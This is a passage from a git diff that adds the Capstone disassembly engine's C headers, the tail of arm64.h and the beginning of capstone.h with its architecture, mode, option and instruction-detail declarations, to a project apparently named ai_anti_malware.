ARM64_REG_X30, +} arm64_reg; + +/// Instruction's operand referring to memory +/// This is associated with ARM64_OP_MEM operand type above +typedef struct arm64_op_mem { + arm64_reg base; ///< base register + arm64_reg index; ///< index register + int32_t disp; ///< displacement/offset value +} arm64_op_mem; + +/// Instruction operand +typedef struct cs_arm64_op { + int vector_index; ///< Vector Index for some vector operands (or -1 if irrelevant) + arm64_vas vas; ///< Vector Arrangement Specifier + arm64_vess vess; ///< Vector Element Size Specifier + struct { + arm64_shifter type; ///< shifter type of this operand + unsigned int value; ///< shifter value of this operand + } shift; + arm64_extender ext; ///< extender type of this operand + arm64_op_type type; ///< operand type + union { + arm64_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value, or index for C-IMM or IMM operand + double fp; ///< floating point value for FP operand + arm64_op_mem mem; ///< base/index/scale/disp value for MEM operand + arm64_pstate pstate; ///< PState field of MSR instruction. + unsigned int sys; ///< IC/DC/AT/TLBI operation (see arm64_ic_op, arm64_dc_op, arm64_at_op, arm64_tlbi_op) + arm64_prefetch_op prefetch; ///< PRFM operation. + arm64_barrier_op barrier; ///< Memory barrier operation (ISB/DMB/DSB instructions). + }; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. + /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; +} cs_arm64_op; + +/// Instruction structure +typedef struct cs_arm64 { + arm64_cc cc; ///< conditional code for this insn + bool update_flags; ///< does this insn update flags? + bool writeback; ///< does this insn request writeback? 'True' means 'yes' + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_arm64_op operands[8]; ///< operands for this instruction. +} cs_arm64; + +/// ARM64 instruction +typedef enum arm64_insn { + ARM64_INS_INVALID = 0, + + ARM64_INS_ABS, + ARM64_INS_ADC, + ARM64_INS_ADDHN, + ARM64_INS_ADDHN2, + ARM64_INS_ADDP, + ARM64_INS_ADD, + ARM64_INS_ADDV, + ARM64_INS_ADR, + ARM64_INS_ADRP, + ARM64_INS_AESD, + ARM64_INS_AESE, + ARM64_INS_AESIMC, + ARM64_INS_AESMC, + ARM64_INS_AND, + ARM64_INS_ASR, + ARM64_INS_B, + ARM64_INS_BFM, + ARM64_INS_BIC, + ARM64_INS_BIF, + ARM64_INS_BIT, + ARM64_INS_BL, + ARM64_INS_BLR, + ARM64_INS_BR, + ARM64_INS_BRK, + ARM64_INS_BSL, + ARM64_INS_CBNZ, + ARM64_INS_CBZ, + ARM64_INS_CCMN, + ARM64_INS_CCMP, + ARM64_INS_CLREX, + ARM64_INS_CLS, + ARM64_INS_CLZ, + ARM64_INS_CMEQ, + ARM64_INS_CMGE, + ARM64_INS_CMGT, + ARM64_INS_CMHI, + ARM64_INS_CMHS, + ARM64_INS_CMLE, + ARM64_INS_CMLT, + ARM64_INS_CMTST, + ARM64_INS_CNT, + ARM64_INS_MOV, + ARM64_INS_CRC32B, + ARM64_INS_CRC32CB, + ARM64_INS_CRC32CH, + ARM64_INS_CRC32CW, + ARM64_INS_CRC32CX, + ARM64_INS_CRC32H, + ARM64_INS_CRC32W, + ARM64_INS_CRC32X, + ARM64_INS_CSEL, + ARM64_INS_CSINC, + ARM64_INS_CSINV, + ARM64_INS_CSNEG, + ARM64_INS_DCPS1, + ARM64_INS_DCPS2, + ARM64_INS_DCPS3, + ARM64_INS_DMB, + ARM64_INS_DRPS, + ARM64_INS_DSB, + ARM64_INS_DUP, + ARM64_INS_EON, + ARM64_INS_EOR, + ARM64_INS_ERET, + ARM64_INS_EXTR, + ARM64_INS_EXT, + ARM64_INS_FABD, + ARM64_INS_FABS, + ARM64_INS_FACGE, + ARM64_INS_FACGT, + ARM64_INS_FADD, + ARM64_INS_FADDP, + ARM64_INS_FCCMP, + ARM64_INS_FCCMPE, + ARM64_INS_FCMEQ, + ARM64_INS_FCMGE, + ARM64_INS_FCMGT, + ARM64_INS_FCMLE, + ARM64_INS_FCMLT, + ARM64_INS_FCMP, + ARM64_INS_FCMPE, + ARM64_INS_FCSEL, + ARM64_INS_FCVTAS, + ARM64_INS_FCVTAU, + ARM64_INS_FCVT, + ARM64_INS_FCVTL, + ARM64_INS_FCVTL2, + ARM64_INS_FCVTMS, + ARM64_INS_FCVTMU, + ARM64_INS_FCVTNS, + ARM64_INS_FCVTNU, + ARM64_INS_FCVTN, + ARM64_INS_FCVTN2, + ARM64_INS_FCVTPS, + ARM64_INS_FCVTPU, + ARM64_INS_FCVTXN, + ARM64_INS_FCVTXN2, + ARM64_INS_FCVTZS, + ARM64_INS_FCVTZU, + ARM64_INS_FDIV, + ARM64_INS_FMADD, + ARM64_INS_FMAX, + ARM64_INS_FMAXNM, + ARM64_INS_FMAXNMP, + ARM64_INS_FMAXNMV, + ARM64_INS_FMAXP, + ARM64_INS_FMAXV, + ARM64_INS_FMIN, + ARM64_INS_FMINNM, + ARM64_INS_FMINNMP, + ARM64_INS_FMINNMV, + ARM64_INS_FMINP, + ARM64_INS_FMINV, + ARM64_INS_FMLA, + ARM64_INS_FMLS, + ARM64_INS_FMOV, + ARM64_INS_FMSUB, + ARM64_INS_FMUL, + ARM64_INS_FMULX, + ARM64_INS_FNEG, + ARM64_INS_FNMADD, + ARM64_INS_FNMSUB, + ARM64_INS_FNMUL, + ARM64_INS_FRECPE, + ARM64_INS_FRECPS, + ARM64_INS_FRECPX, + ARM64_INS_FRINTA, + ARM64_INS_FRINTI, + ARM64_INS_FRINTM, + ARM64_INS_FRINTN, + ARM64_INS_FRINTP, + ARM64_INS_FRINTX, + ARM64_INS_FRINTZ, + ARM64_INS_FRSQRTE, + ARM64_INS_FRSQRTS, + ARM64_INS_FSQRT, + ARM64_INS_FSUB, + ARM64_INS_HINT, + ARM64_INS_HLT, + ARM64_INS_HVC, + ARM64_INS_INS, + + ARM64_INS_ISB, + ARM64_INS_LD1, + ARM64_INS_LD1R, + ARM64_INS_LD2R, + ARM64_INS_LD2, + ARM64_INS_LD3R, + ARM64_INS_LD3, + ARM64_INS_LD4, + ARM64_INS_LD4R, + + ARM64_INS_LDARB, + ARM64_INS_LDARH, + ARM64_INS_LDAR, + ARM64_INS_LDAXP, + ARM64_INS_LDAXRB, + ARM64_INS_LDAXRH, + ARM64_INS_LDAXR, + ARM64_INS_LDNP, + ARM64_INS_LDP, + ARM64_INS_LDPSW, + ARM64_INS_LDRB, + ARM64_INS_LDR, + ARM64_INS_LDRH, + ARM64_INS_LDRSB, + ARM64_INS_LDRSH, + ARM64_INS_LDRSW, + ARM64_INS_LDTRB, + ARM64_INS_LDTRH, + ARM64_INS_LDTRSB, + + ARM64_INS_LDTRSH, + ARM64_INS_LDTRSW, + ARM64_INS_LDTR, + ARM64_INS_LDURB, + ARM64_INS_LDUR, + ARM64_INS_LDURH, + ARM64_INS_LDURSB, + ARM64_INS_LDURSH, + ARM64_INS_LDURSW, + ARM64_INS_LDXP, + ARM64_INS_LDXRB, + ARM64_INS_LDXRH, + ARM64_INS_LDXR, + ARM64_INS_LSL, + ARM64_INS_LSR, + ARM64_INS_MADD, + ARM64_INS_MLA, + ARM64_INS_MLS, + ARM64_INS_MOVI, + ARM64_INS_MOVK, + ARM64_INS_MOVN, + ARM64_INS_MOVZ, + ARM64_INS_MRS, + ARM64_INS_MSR, + ARM64_INS_MSUB, + ARM64_INS_MUL, + ARM64_INS_MVNI, + ARM64_INS_NEG, + ARM64_INS_NOT, + ARM64_INS_ORN, + ARM64_INS_ORR, + ARM64_INS_PMULL2, + ARM64_INS_PMULL, + ARM64_INS_PMUL, + ARM64_INS_PRFM, + ARM64_INS_PRFUM, + ARM64_INS_RADDHN, + ARM64_INS_RADDHN2, + ARM64_INS_RBIT, + ARM64_INS_RET, + ARM64_INS_REV16, + ARM64_INS_REV32, + ARM64_INS_REV64, + ARM64_INS_REV, + ARM64_INS_ROR, + ARM64_INS_RSHRN2, + ARM64_INS_RSHRN, + ARM64_INS_RSUBHN, + ARM64_INS_RSUBHN2, + ARM64_INS_SABAL2, + ARM64_INS_SABAL, + + ARM64_INS_SABA, + ARM64_INS_SABDL2, + ARM64_INS_SABDL, + ARM64_INS_SABD, + ARM64_INS_SADALP, + ARM64_INS_SADDLP, + ARM64_INS_SADDLV, + ARM64_INS_SADDL2, + ARM64_INS_SADDL, + ARM64_INS_SADDW2, + ARM64_INS_SADDW, + ARM64_INS_SBC, + ARM64_INS_SBFM, + ARM64_INS_SCVTF, + ARM64_INS_SDIV, + ARM64_INS_SHA1C, + ARM64_INS_SHA1H, + ARM64_INS_SHA1M, + ARM64_INS_SHA1P, + ARM64_INS_SHA1SU0, + ARM64_INS_SHA1SU1, + ARM64_INS_SHA256H2, + ARM64_INS_SHA256H, + ARM64_INS_SHA256SU0, + ARM64_INS_SHA256SU1, + ARM64_INS_SHADD, + ARM64_INS_SHLL2, + ARM64_INS_SHLL, + ARM64_INS_SHL, + ARM64_INS_SHRN2, + ARM64_INS_SHRN, + ARM64_INS_SHSUB, + ARM64_INS_SLI, + ARM64_INS_SMADDL, + ARM64_INS_SMAXP, + ARM64_INS_SMAXV, + ARM64_INS_SMAX, + ARM64_INS_SMC, + ARM64_INS_SMINP, + ARM64_INS_SMINV, + ARM64_INS_SMIN, + ARM64_INS_SMLAL2, + ARM64_INS_SMLAL, + ARM64_INS_SMLSL2, + ARM64_INS_SMLSL, + ARM64_INS_SMOV, + ARM64_INS_SMSUBL, + ARM64_INS_SMULH, + ARM64_INS_SMULL2, + ARM64_INS_SMULL, + ARM64_INS_SQABS, + ARM64_INS_SQADD, + ARM64_INS_SQDMLAL, + ARM64_INS_SQDMLAL2, + ARM64_INS_SQDMLSL, + ARM64_INS_SQDMLSL2, + ARM64_INS_SQDMULH, + ARM64_INS_SQDMULL, + ARM64_INS_SQDMULL2, + ARM64_INS_SQNEG, + ARM64_INS_SQRDMULH, + ARM64_INS_SQRSHL, + ARM64_INS_SQRSHRN, + ARM64_INS_SQRSHRN2, + ARM64_INS_SQRSHRUN, + ARM64_INS_SQRSHRUN2, + ARM64_INS_SQSHLU, + ARM64_INS_SQSHL, + ARM64_INS_SQSHRN, + ARM64_INS_SQSHRN2, + ARM64_INS_SQSHRUN, + ARM64_INS_SQSHRUN2, + ARM64_INS_SQSUB, + ARM64_INS_SQXTN2, + ARM64_INS_SQXTN, + ARM64_INS_SQXTUN2, + ARM64_INS_SQXTUN, + ARM64_INS_SRHADD, + ARM64_INS_SRI, + ARM64_INS_SRSHL, + ARM64_INS_SRSHR, + ARM64_INS_SRSRA, + ARM64_INS_SSHLL2, + ARM64_INS_SSHLL, + ARM64_INS_SSHL, + ARM64_INS_SSHR, + ARM64_INS_SSRA, + ARM64_INS_SSUBL2, + ARM64_INS_SSUBL, + ARM64_INS_SSUBW2, + ARM64_INS_SSUBW, + ARM64_INS_ST1, + ARM64_INS_ST2, + ARM64_INS_ST3, + ARM64_INS_ST4, + ARM64_INS_STLRB, + ARM64_INS_STLRH, + ARM64_INS_STLR, + ARM64_INS_STLXP, + ARM64_INS_STLXRB, + ARM64_INS_STLXRH, + ARM64_INS_STLXR, + ARM64_INS_STNP, + ARM64_INS_STP, + ARM64_INS_STRB, + ARM64_INS_STR, + ARM64_INS_STRH, + ARM64_INS_STTRB, + ARM64_INS_STTRH, + ARM64_INS_STTR, + ARM64_INS_STURB, + ARM64_INS_STUR, + ARM64_INS_STURH, + ARM64_INS_STXP, + ARM64_INS_STXRB, + ARM64_INS_STXRH, + ARM64_INS_STXR, + ARM64_INS_SUBHN, + ARM64_INS_SUBHN2, + ARM64_INS_SUB, + ARM64_INS_SUQADD, + ARM64_INS_SVC, + ARM64_INS_SYSL, + ARM64_INS_SYS, + ARM64_INS_TBL, + ARM64_INS_TBNZ, + ARM64_INS_TBX, + ARM64_INS_TBZ, + ARM64_INS_TRN1, + ARM64_INS_TRN2, + ARM64_INS_UABAL2, + ARM64_INS_UABAL, + ARM64_INS_UABA, + ARM64_INS_UABDL2, + ARM64_INS_UABDL, + ARM64_INS_UABD, + ARM64_INS_UADALP, + ARM64_INS_UADDLP, + ARM64_INS_UADDLV, + ARM64_INS_UADDL2, + ARM64_INS_UADDL, + ARM64_INS_UADDW2, + ARM64_INS_UADDW, + ARM64_INS_UBFM, + ARM64_INS_UCVTF, + ARM64_INS_UDIV, + ARM64_INS_UHADD, + ARM64_INS_UHSUB, + ARM64_INS_UMADDL, + ARM64_INS_UMAXP, + ARM64_INS_UMAXV, + ARM64_INS_UMAX, + ARM64_INS_UMINP, + ARM64_INS_UMINV, + ARM64_INS_UMIN, + ARM64_INS_UMLAL2, + ARM64_INS_UMLAL, + ARM64_INS_UMLSL2, + ARM64_INS_UMLSL, + ARM64_INS_UMOV, + ARM64_INS_UMSUBL, + ARM64_INS_UMULH, + ARM64_INS_UMULL2, + ARM64_INS_UMULL, + ARM64_INS_UQADD, + ARM64_INS_UQRSHL, + ARM64_INS_UQRSHRN, + ARM64_INS_UQRSHRN2, + ARM64_INS_UQSHL, + ARM64_INS_UQSHRN, + ARM64_INS_UQSHRN2, + ARM64_INS_UQSUB, + ARM64_INS_UQXTN2, + ARM64_INS_UQXTN, + ARM64_INS_URECPE, + ARM64_INS_URHADD, + ARM64_INS_URSHL, + ARM64_INS_URSHR, + ARM64_INS_URSQRTE, + ARM64_INS_URSRA, + ARM64_INS_USHLL2, + ARM64_INS_USHLL, + ARM64_INS_USHL, + ARM64_INS_USHR, + ARM64_INS_USQADD, + ARM64_INS_USRA, + ARM64_INS_USUBL2, + ARM64_INS_USUBL, + ARM64_INS_USUBW2, + ARM64_INS_USUBW, + ARM64_INS_UZP1, + ARM64_INS_UZP2, + ARM64_INS_XTN2, + ARM64_INS_XTN, + ARM64_INS_ZIP1, + ARM64_INS_ZIP2, + + // alias insn + ARM64_INS_MNEG, + ARM64_INS_UMNEGL, + ARM64_INS_SMNEGL, + ARM64_INS_NOP, + ARM64_INS_YIELD, + ARM64_INS_WFE, + ARM64_INS_WFI, + ARM64_INS_SEV, + ARM64_INS_SEVL, + ARM64_INS_NGC, + ARM64_INS_SBFIZ, + ARM64_INS_UBFIZ, + ARM64_INS_SBFX, + ARM64_INS_UBFX, + ARM64_INS_BFI, + ARM64_INS_BFXIL, + ARM64_INS_CMN, + ARM64_INS_MVN, + ARM64_INS_TST, + ARM64_INS_CSET, + ARM64_INS_CINC, + ARM64_INS_CSETM, + ARM64_INS_CINV, + ARM64_INS_CNEG, + ARM64_INS_SXTB, + ARM64_INS_SXTH, + ARM64_INS_SXTW, + ARM64_INS_CMP, + ARM64_INS_UXTB, + ARM64_INS_UXTH, + ARM64_INS_UXTW, + ARM64_INS_IC, + ARM64_INS_DC, + ARM64_INS_AT, + ARM64_INS_TLBI, + + ARM64_INS_NEGS, + ARM64_INS_NGCS, + + ARM64_INS_ENDING, // <-- mark the end of the list of insn +} arm64_insn; + +/// Group of ARM64 instructions +typedef enum arm64_insn_group { + ARM64_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + ARM64_GRP_JUMP, ///< = CS_GRP_JUMP + ARM64_GRP_CALL, + ARM64_GRP_RET, + ARM64_GRP_INT, + ARM64_GRP_PRIVILEGE = 6, ///< = CS_GRP_PRIVILEGE + ARM64_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + ARM64_GRP_CRYPTO = 128, + ARM64_GRP_FPARMV8, + ARM64_GRP_NEON, + ARM64_GRP_CRC, + + ARM64_GRP_ENDING, // <-- mark the end of the list of groups +} arm64_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/capstone.h b/ai_anti_malware/capstone/include/capstone/capstone.h new file mode 100644 index 0000000..23c13d5 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/capstone.h @@ -0,0 +1,766 @@ +#ifndef CAPSTONE_ENGINE_H +#define CAPSTONE_ENGINE_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2016 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include + +#if defined(CAPSTONE_HAS_OSXKERNEL) +#include +#else +#include +#include +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#define CAPSTONE_API __cdecl +#ifdef CAPSTONE_SHARED +#define CAPSTONE_EXPORT __declspec(dllexport) +#else // defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT +#endif +#else +#define CAPSTONE_API +#if defined(__GNUC__) && !defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT __attribute__((visibility("default"))) +#else // defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define CAPSTONE_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define CAPSTONE_DEPRECATED __declspec(deprecated) +#else +#pragma message("WARNING: You need to implement CAPSTONE_DEPRECATED for this compiler") +#define CAPSTONE_DEPRECATED +#endif + +// Capstone API version +#define CS_API_MAJOR 4 +#define CS_API_MINOR 0 + +// Version for bleeding edge code of the Github's "next" branch. +// Use this if you want the absolutely latest development code. +// This version number will be bumped up whenever we have a new major change. +#define CS_NEXT_VERSION 5 + +// Capstone package version +#define CS_VERSION_MAJOR CS_API_MAJOR +#define CS_VERSION_MINOR CS_API_MINOR +#define CS_VERSION_EXTRA 2 + +/// Macro to create combined version which can be compared to +/// result of cs_version() API. +#define CS_MAKE_VERSION(major, minor) ((major << 8) + minor) + +/// Maximum size of an instruction mnemonic string. +#define CS_MNEMONIC_SIZE 32 + +// Handle using with all API +typedef size_t csh; + +/// Architecture type +typedef enum cs_arch { + CS_ARCH_ARM = 0, ///< ARM architecture (including Thumb, Thumb-2) + CS_ARCH_ARM64, ///< ARM-64, also called AArch64 + CS_ARCH_MIPS, ///< Mips architecture + CS_ARCH_X86, ///< X86 architecture (including x86 & x86-64) + CS_ARCH_PPC, ///< PowerPC architecture + CS_ARCH_SPARC, ///< Sparc architecture + CS_ARCH_SYSZ, ///< SystemZ architecture + CS_ARCH_XCORE, ///< XCore architecture + CS_ARCH_M68K, ///< 68K architecture + CS_ARCH_TMS320C64X, ///< TMS320C64x architecture + CS_ARCH_M680X, ///< 680X architecture + CS_ARCH_EVM, ///< Ethereum architecture + CS_ARCH_MAX, + CS_ARCH_ALL = 0xFFFF, // All architectures - for cs_support() +} cs_arch; + +// Support value to verify diet mode of the engine. +// If cs_support(CS_SUPPORT_DIET) return True, the engine was compiled +// in diet mode. +#define CS_SUPPORT_DIET (CS_ARCH_ALL + 1) + +// Support value to verify X86 reduce mode of the engine. +// If cs_support(CS_SUPPORT_X86_REDUCE) return True, the engine was compiled +// in X86 reduce mode. +#define CS_SUPPORT_X86_REDUCE (CS_ARCH_ALL + 2) + +/// Mode type +typedef enum cs_mode { + CS_MODE_LITTLE_ENDIAN = 0, ///< little-endian mode (default mode) + CS_MODE_ARM = 0, ///< 32-bit ARM + CS_MODE_16 = 1 << 1, ///< 16-bit mode (X86) + CS_MODE_32 = 1 << 2, ///< 32-bit mode (X86) + CS_MODE_64 = 1 << 3, ///< 64-bit mode (X86, PPC) + CS_MODE_THUMB = 1 << 4, ///< ARM's Thumb mode, including Thumb-2 + CS_MODE_MCLASS = 1 << 5, ///< ARM's Cortex-M series + CS_MODE_V8 = 1 << 6, ///< ARMv8 A32 encodings for ARM + CS_MODE_MICRO = 1 << 4, ///< MicroMips mode (MIPS) + CS_MODE_MIPS3 = 1 << 5, ///< Mips III ISA + CS_MODE_MIPS32R6 = 1 << 6, ///< Mips32r6 ISA + CS_MODE_MIPS2 = 1 << 7, ///< Mips II ISA + CS_MODE_V9 = 1 << 4, ///< SparcV9 mode (Sparc) + CS_MODE_QPX = 1 << 4, ///< Quad Processing eXtensions mode (PPC) + CS_MODE_M68K_000 = 1 << 1, ///< M68K 68000 mode + CS_MODE_M68K_010 = 1 << 2, ///< M68K 68010 mode + CS_MODE_M68K_020 = 1 << 3, ///< M68K 68020 mode + CS_MODE_M68K_030 = 1 << 4, ///< M68K 68030 mode + CS_MODE_M68K_040 = 1 << 5, ///< M68K 68040 mode + CS_MODE_M68K_060 = 1 << 6, ///< M68K 68060 mode + CS_MODE_BIG_ENDIAN = 1 << 31, ///< big-endian mode + CS_MODE_MIPS32 = CS_MODE_32, ///< Mips32 ISA (Mips) + CS_MODE_MIPS64 = CS_MODE_64, ///< Mips64 ISA (Mips) + CS_MODE_M680X_6301 = 1 << 1, ///< M680X Hitachi 6301,6303 mode + CS_MODE_M680X_6309 = 1 << 2, ///< M680X Hitachi 6309 mode + CS_MODE_M680X_6800 = 1 << 3, ///< M680X Motorola 6800,6802 mode + CS_MODE_M680X_6801 = 1 << 4, ///< M680X Motorola 6801,6803 mode + CS_MODE_M680X_6805 = 1 << 5, ///< M680X Motorola/Freescale 6805 mode + CS_MODE_M680X_6808 = 1 << 6, ///< M680X Motorola/Freescale/NXP 68HC08 mode + CS_MODE_M680X_6809 = 1 << 7, ///< M680X Motorola 6809 mode + CS_MODE_M680X_6811 = 1 << 8, ///< M680X Motorola/Freescale/NXP 68HC11 mode + CS_MODE_M680X_CPU12 = 1 << 9, ///< M680X Motorola/Freescale/NXP CPU12 + ///< used on M68HC12/HCS12 + CS_MODE_M680X_HCS08 = 1 << 10, ///< M680X Freescale/NXP HCS08 mode +} cs_mode; + +typedef void* (CAPSTONE_API *cs_malloc_t)(size_t size); +typedef void* (CAPSTONE_API *cs_calloc_t)(size_t nmemb, size_t size); +typedef void* (CAPSTONE_API *cs_realloc_t)(void *ptr, size_t size); +typedef void (CAPSTONE_API *cs_free_t)(void *ptr); +typedef int (CAPSTONE_API *cs_vsnprintf_t)(char *str, size_t size, const char *format, va_list ap); + + +/// User-defined dynamic memory related functions: malloc/calloc/realloc/free/vsnprintf() +/// By default, Capstone uses system's malloc(), calloc(), realloc(), free() & vsnprintf(). +typedef struct cs_opt_mem { + cs_malloc_t malloc; + cs_calloc_t calloc; + cs_realloc_t realloc; + cs_free_t free; + cs_vsnprintf_t vsnprintf; +} cs_opt_mem; + +/// Customize mnemonic for instructions with alternative name. +/// To reset existing customized instruction to its default mnemonic, +/// call cs_option(CS_OPT_MNEMONIC) again with the same @id and NULL value +/// for @mnemonic. +typedef struct cs_opt_mnem { + /// ID of instruction to be customized. + unsigned int id; + /// Customized instruction mnemonic. + const char *mnemonic; +} cs_opt_mnem; + +/// Runtime option for the disassembled engine +typedef enum cs_opt_type { + CS_OPT_INVALID = 0, ///< No option specified + CS_OPT_SYNTAX, ///< Assembly output syntax + CS_OPT_DETAIL, ///< Break down instruction structure into details + CS_OPT_MODE, ///< Change engine's mode at run-time + CS_OPT_MEM, ///< User-defined dynamic memory related functions + CS_OPT_SKIPDATA, ///< Skip data when disassembling. Then engine is in SKIPDATA mode. + CS_OPT_SKIPDATA_SETUP, ///< Setup user-defined function for SKIPDATA option + CS_OPT_MNEMONIC, ///< Customize instruction mnemonic + CS_OPT_UNSIGNED, ///< print immediate operands in unsigned form +} cs_opt_type; + +/// Runtime option value (associated with option type above) +typedef enum cs_opt_value { + CS_OPT_OFF = 0, ///< Turn OFF an option - default for CS_OPT_DETAIL, CS_OPT_SKIPDATA, CS_OPT_UNSIGNED. + CS_OPT_ON = 3, ///< Turn ON an option (CS_OPT_DETAIL, CS_OPT_SKIPDATA). + CS_OPT_SYNTAX_DEFAULT = 0, ///< Default asm syntax (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_INTEL, ///< X86 Intel asm syntax - default on X86 (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_ATT, ///< X86 ATT asm syntax (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_NOREGNAME, ///< Prints register name with only number (CS_OPT_SYNTAX) + CS_OPT_SYNTAX_MASM, ///< X86 Intel Masm syntax (CS_OPT_SYNTAX). +} cs_opt_value; + +/// Common instruction operand types - to be consistent across all architectures. +typedef enum cs_op_type { + CS_OP_INVALID = 0, ///< uninitialized/invalid operand. + CS_OP_REG, ///< Register operand. + CS_OP_IMM, ///< Immediate operand. + CS_OP_MEM, ///< Memory operand. + CS_OP_FP, ///< Floating-Point operand. +} cs_op_type; + +/// Common instruction operand access types - to be consistent across all architectures. +/// It is possible to combine access types, for example: CS_AC_READ | CS_AC_WRITE +typedef enum cs_ac_type { + CS_AC_INVALID = 0, ///< Uninitialized/invalid access type. + CS_AC_READ = 1 << 0, ///< Operand read from memory or register. + CS_AC_WRITE = 1 << 1, ///< Operand write to memory or register. +} cs_ac_type; + +/// Common instruction groups - to be consistent across all architectures. +typedef enum cs_group_type { + CS_GRP_INVALID = 0, ///< uninitialized/invalid group. + CS_GRP_JUMP, ///< all jump instructions (conditional+direct+indirect jumps) + CS_GRP_CALL, ///< all call instructions + CS_GRP_RET, ///< all return instructions + CS_GRP_INT, ///< all interrupt instructions (int+syscall) + CS_GRP_IRET, ///< all interrupt return instructions + CS_GRP_PRIVILEGE, ///< all privileged instructions + CS_GRP_BRANCH_RELATIVE, ///< all relative branching instructions +} cs_group_type; + +/** + User-defined callback function for SKIPDATA option. + See tests/test_skipdata.c for sample code demonstrating this API. + + @code: the input buffer containing code to be disassembled. + This is the same buffer passed to cs_disasm(). + @code_size: size (in bytes) of the above @code buffer. + @offset: the position of the currently-examining byte in the input + buffer @code mentioned above. + @user_data: user-data passed to cs_option() via @user_data field in + cs_opt_skipdata struct below. + + @return: return number of bytes to skip, or 0 to immediately stop disassembling. +*/ +typedef size_t (CAPSTONE_API *cs_skipdata_cb_t)(const uint8_t *code, size_t code_size, size_t offset, void *user_data); + +/// User-customized setup for SKIPDATA option +typedef struct cs_opt_skipdata { + /// Capstone considers data to skip as special "instructions". + /// User can specify the string for this instruction's "mnemonic" here. + /// By default (if @mnemonic is NULL), Capstone use ".byte". + const char *mnemonic; + + /// User-defined callback function to be called when Capstone hits data. + /// If the returned value from this callback is positive (>0), Capstone + /// will skip exactly that number of bytes & continue. Otherwise, if + /// the callback returns 0, Capstone stops disassembling and returns + /// immediately from cs_disasm() + /// NOTE: if this callback pointer is NULL, Capstone would skip a number + /// of bytes depending on architectures, as following: + /// Arm: 2 bytes (Thumb mode) or 4 bytes. + /// Arm64: 4 bytes. + /// Mips: 4 bytes. + /// M680x: 1 byte. + /// PowerPC: 4 bytes. + /// Sparc: 4 bytes. + /// SystemZ: 2 bytes. + /// X86: 1 bytes. + /// XCore: 2 bytes. + /// EVM: 1 bytes. + cs_skipdata_cb_t callback; // default value is NULL + + /// User-defined data to be passed to @callback function pointer. + void *user_data; +} cs_opt_skipdata; + + +#include "arm.h" +#include "arm64.h" +#include "m68k.h" +#include "mips.h" +#include "ppc.h" +#include "sparc.h" +#include "systemz.h" +#include "x86.h" +#include "xcore.h" +#include "tms320c64x.h" +#include "m680x.h" +#include "evm.h" + +/// NOTE: All information in cs_detail is only available when CS_OPT_DETAIL = CS_OPT_ON +/// Initialized as memset(., 0, offsetof(cs_detail, ARCH)+sizeof(cs_ARCH)) +/// by ARCH_getInstruction in arch/ARCH/ARCHDisassembler.c +/// if cs_detail changes, in particular if a field is added after the union, +/// then update arch/ARCH/ARCHDisassembler.c accordingly +typedef struct cs_detail { + uint16_t regs_read[12]; ///< list of implicit registers read by this insn + uint8_t regs_read_count; ///< number of implicit registers read by this insn + + uint16_t regs_write[20]; ///< list of implicit registers modified by this insn + uint8_t regs_write_count; ///< number of implicit registers modified by this insn + + uint8_t groups[8]; ///< list of group this instruction belong to + uint8_t groups_count; ///< number of groups this insn belongs to + + /// Architecture-specific instruction info + union { + cs_x86 x86; ///< X86 architecture, including 16-bit, 32-bit & 64-bit mode + cs_arm64 arm64; ///< ARM64 architecture (aka AArch64) + cs_arm arm; ///< ARM architecture (including Thumb/Thumb2) + cs_m68k m68k; ///< M68K architecture + cs_mips mips; ///< MIPS architecture + cs_ppc ppc; ///< PowerPC architecture + cs_sparc sparc; ///< Sparc architecture + cs_sysz sysz; ///< SystemZ architecture + cs_xcore xcore; ///< XCore architecture + cs_tms320c64x tms320c64x; ///< TMS320C64x architecture + cs_m680x m680x; ///< M680X architecture + cs_evm evm; ///< Ethereum architecture + }; +} cs_detail; + +/// Detail information of disassembled instruction +typedef struct cs_insn { + /// Instruction ID (basically a numeric ID for the instruction mnemonic) + /// Find the instruction id in the '[ARCH]_insn' enum in the header file + /// of corresponding architecture, such as 'arm_insn' in arm.h for ARM, + /// 'x86_insn' in x86.h for X86, etc... + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + /// NOTE: in Skipdata mode, "data" instruction has 0 for this id field. + unsigned int id; + + /// Address (EIP) of this instruction + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint64_t address; + + /// Size of this instruction + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint16_t size; + + /// Machine bytes of this instruction, with number of bytes indicated by @size above + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint8_t bytes[16]; + + /// Ascii text of instruction mnemonic + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + char mnemonic[CS_MNEMONIC_SIZE]; + + /// Ascii text of instruction operands + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + char op_str[160]; + + /// Pointer to cs_detail. + /// NOTE: detail pointer is only valid when both requirements below are met: + /// (1) CS_OP_DETAIL = CS_OPT_ON + /// (2) Engine is not in Skipdata mode (CS_OP_SKIPDATA option set to CS_OPT_ON) + /// + /// NOTE 2: when in Skipdata mode, or when detail mode is OFF, even if this pointer + /// is not NULL, its content is still irrelevant. + cs_detail *detail; +} cs_insn; + + +/// Calculate the offset of a disassembled instruction in its buffer, given its position +/// in its array of disassembled insn +/// NOTE: this 